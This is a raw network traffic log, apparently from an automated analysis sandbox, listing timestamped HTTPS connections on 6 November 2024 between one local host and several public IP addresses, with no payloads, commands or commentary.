                                                                                                                                              Nov 6, 2024 16:55:28.066543102 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:28.066593885 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:28.067441940 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:28.067464113 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:31.632028103 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:31.632051945 CET44349770188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:31.632165909 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:31.632519960 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:31.632544041 CET44349770188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:31.633151054 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:31.633187056 CET44349771188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:31.633251905 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:31.633548975 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:31.633562088 CET44349771188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.241955996 CET44349770188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.242413044 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.242434978 CET44349770188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.243549109 CET44349770188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.243621111 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.245024920 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.245059967 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.245115995 CET44349770188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.245158911 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.245184898 CET49770443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.245641947 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.245688915 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.245764971 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.246014118 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.246028900 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.246656895 CET44349771188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.246897936 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.246920109 CET44349771188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.247973919 CET44349771188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.248065948 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248352051 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248352051 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248394012 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248415947 CET44349771188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.248531103 CET49771443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248648882 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248677015 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.248738050 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248924971 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.248939991 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.857722044 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.858148098 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.858181000 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.859268904 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.859350920 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.860610962 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.860693932 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.860958099 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.860984087 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.884948969 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.885346889 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.885377884 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.886459112 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.886538029 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.886851072 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.886918068 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.909121037 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.940119028 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:32.940144062 CET44349773188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:32.988149881 CET49773443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.437485933 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.437585115 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.437618971 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.437674046 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.437676907 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.437696934 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.437747002 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.438155890 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.438220024 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.438229084 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.438374043 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.438406944 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.438429117 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.438435078 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.438477039 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.552756071 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.553380013 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.553473949 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.553486109 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.553520918 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.553570986 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.554019928 CET49772443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:33.554029942 CET44349772188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.566040993 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:33.566101074 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.566190004 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:33.566529989 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:33.566557884 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.567395926 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:33.567431927 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.567495108 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:33.567753077 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:33.567795038 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.567852974 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:33.568001986 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:33.568012953 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.568178892 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:33.568192959 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.189644098 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.190035105 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.190058947 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.191113949 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.191190004 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.192737103 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.192820072 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.193088055 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.193105936 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.195559025 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.195785999 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.195807934 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.196966887 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.197051048 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.197835922 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.197994947 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.198066950 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.198185921 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.198204041 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.198327065 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.198333979 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.199393034 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.199460983 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.200273991 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.200342894 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.200417042 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.200423956 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.248127937 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.248132944 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.248132944 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.316642046 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341176033 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341206074 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341267109 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341314077 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341346979 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.341372013 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.341386080 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341520071 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341561079 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341567039 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.341574907 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.341615915 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.342020035 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.342092991 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.342133999 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.342139006 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.342449903 CET49775443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.342468023 CET44349775104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.344399929 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.344424009 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.344516039 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.344732046 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.344743013 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.360130072 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.392133951 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.392152071 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.433752060 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.433764935 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.433789015 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.433825970 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.433835030 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.433931112 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.433954000 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.434000969 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.434026003 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.435781002 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.435790062 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.435812950 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.435878038 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.435887098 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.435915947 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.435940027 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.440104961 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.459876060 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460321903 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460360050 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460414886 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.460433006 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460472107 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460481882 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.460488081 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460536957 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.460541964 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460814953 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.460863113 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.460869074 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.461441040 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.461479902 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.461505890 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.461512089 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.461565971 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.461857080 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.461947918 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.461993933 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.461998940 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.462033033 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.462083101 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.462088108 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.462724924 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.462780952 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.462786913 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.504143000 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.505570889 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.551028013 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.551059961 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.551126957 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.551156998 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.551178932 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.551204920 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.552083015 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.552099943 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.552318096 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.552335024 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.552391052 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.552407980 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.552453995 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.554028034 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.554047108 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.554122925 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.554126978 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.554136992 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.554172993 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.554218054 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.554285049 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.554414988 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.554430008 CET44349774151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.554444075 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.554486990 CET49774443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.565665007 CET49778443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.565687895 CET44349778151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.565773964 CET49778443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.566016912 CET49778443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:34.566026926 CET44349778151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578516006 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578561068 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578599930 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578691959 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.578707933 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578828096 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.578928947 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578986883 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.578989029 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.578998089 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.579087019 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.579118013 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.579157114 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.579322100 CET49776443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.579336882 CET44349776104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.589895964 CET49779443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.589941978 CET44349779104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.590015888 CET49779443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.590229034 CET49779443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:34.590245962 CET44349779104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.940282106 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.940614939 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.940638065 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.940967083 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.941334009 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.941395998 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.941509962 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:34.983336926 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.078993082 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079067945 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079106092 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079123974 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.079135895 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079147100 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079186916 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.079197884 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079240084 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.079577923 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079719067 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079747915 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079761028 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.079767942 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.079807997 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361331940 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361428022 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361464977 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361485004 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361504078 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361512899 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361557961 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361573935 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361614943 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361615896 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361624956 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361658096 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361665964 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361753941 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361798048 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361804962 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361848116 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361882925 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361886024 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361893892 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361933947 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.361942053 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361968994 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361994028 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.361999989 CET49777443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:35.362008095 CET44349777104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.362029076 CET44349777104.18.94.41192.168.2.18
